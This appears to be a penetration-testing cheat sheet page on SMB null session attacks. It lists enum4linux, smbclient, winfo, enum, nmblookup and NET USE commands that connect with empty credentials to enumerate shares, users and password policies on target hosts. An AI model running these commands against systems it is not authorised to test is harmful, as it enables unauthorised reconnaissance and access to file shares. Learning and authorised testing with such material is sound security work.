🎯Null Session Attacks

Null Session Attack Tools

[1] enum4linux
[2] smbclient
[3] winfo
[4] enum
[5] NET USE

Enumeration using `enum4linux`

enum4linux -a <IP-Address>

enum4linux -n <IP-Address>

Notations

-a ==> Do all simple enumeration
-n ==> Do an nmblookup (similar to nbtstat)

Enumeration and Exploitation Using `smbclient`

Share Enumeration can be performed using tools provided by Samba Suitesmbclient is an FTP like client to access Windows shares; this tool can, among other things, enumerate the shares provided by a host

Command Example

smbclient -L //10.130.40.80 -N

Checking for Null Sessions with Linux

We can also perform the very same checks by using smbclient:

smbclient //10.130.40.80/IPC$ -N

smbclient //10.130.40.80/C$ -N

smbclient \\\\\\\\192.168.99.162\\\\WorkSharing -N

useful smbclient commands

smbclient -L WORKGROUP -I 192.168.99.162 -N -U ""

Exploiting Null Sessions with `winfo`

Winfo is another command line utility we can use to automate null session exploitation. To use it, you just need to specify the target IP address and use the -n command line switch to tell the tool to use null sessions.

winfo is available in packetstorm

Basic Command Syntax

winfo <ip-address> -n

Notation

-n ==> Null Sessions

Exploiting Null Sessions with `enum`

** Please Note ** It will note administrative shares too.enum is available in packetstorm

enum -S <ip-address>

enum -U <ip-address>

enum -P <ip-address>

Notations

-S ==> Enumerate the Shares of a Machine
-U ==> Enumerate the Users of a Machine
-P ==> Let us see the Password Policy if wwe want to mount the network [Authentication Attacks]

Enumerate Using `nmblookup`

To perform the same operations of nbstat, we can use nmblookup with the same command line switch:

Command Syntax

nmblookup -A <target-IP-Address>

Enumerate using `NET VIEW`

Once an attacker knows that a machine has File Server service running, they can enumerate the shares by using the NET VIEW command

Command Syntax

NET VIEW <target-IP>

Checking Null Sessions with Windows

To connect, we have to type the following command in a Windows shell:

NET USE \\\\<target-IP-address>\\IPC$ '' /u:''

This tells Windows to connect to the IPC$ share by using an empty password and an empty username!

PreviousXSS Attacks NextReverse Connection & Exploitation

Last updated 2 years ago

hashtagNull Session Attack Tools

hashtagEnumeration using enum4linux

hashtagEnumeration and Exploitation Using smbclient

hashtagExploiting Null Sessions with winfo

hashtagExploiting Null Sessions with enum

hashtagEnumerate Using nmblookup

hashtagEnumerate using NET VIEW

hashtagChecking Null Sessions with Windows